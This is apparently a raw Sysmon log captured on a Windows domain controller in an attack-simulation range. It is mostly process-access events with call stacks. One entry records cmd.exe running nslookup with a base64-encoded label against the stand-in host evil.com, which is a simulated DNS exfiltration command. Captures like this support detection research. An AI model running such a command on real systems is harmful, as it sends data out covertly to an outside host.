14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.993{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.993{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.960{2E1864BB-E13E-6299-1000-000000005F02}3647932C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b910|C:\Windows\system32\wbem\wbemcore.dll+255ef|C:\Windows\system32\wbem\wbemcore.dll+24a8a|C:\Windows\system32\wbem\wbemcore.dll+2484e|C:\Windows\system32\wbem\wbemcore.dll+2684b|C:\Windows\system32\wbem\wbemcore.dll+22b68|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+22701|C:\Windows\system32\wbem\wbemcore.dll+2d77c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.913{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+25bc9|c:\windows\system32\rpcss.dll+40ca2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.913{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b87d|C:\Windows\system32\lsasrv.dll+2875b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.897{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluzhc.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-18E2-629A-6C42-000000005F02}80081772C:\Windows\system32\conhost.exe{2E1864BB-18E2-629A-6D42-000000005F02}1660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6D42-000000005F02}1660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.860{2E1864BB-18E2-629A-6B42-000000005F02}56205200C:\Windows\system32\cmd.exe{2E1864BB-18E2-629A-6D42-000000005F02}1660C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.861{2E1864BB-18E2-629A-6D42-000000005F02}1660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E2-629A-6B42-000000005F02}5620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluzhc.tmp 2>&1 10341000x8000000000000000206052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.828{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6C42-000000005F02}8008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.828{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6C42-000000005F02}8008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.828{2E1864BB-18E2-629A-6C42-000000005F02}80081772C:\Windows\system32\conhost.exe{2E1864BB-18E2-629A-6B42-000000005F02}5620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.813{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6C42-000000005F02}8008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6B42-000000005F02}5620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 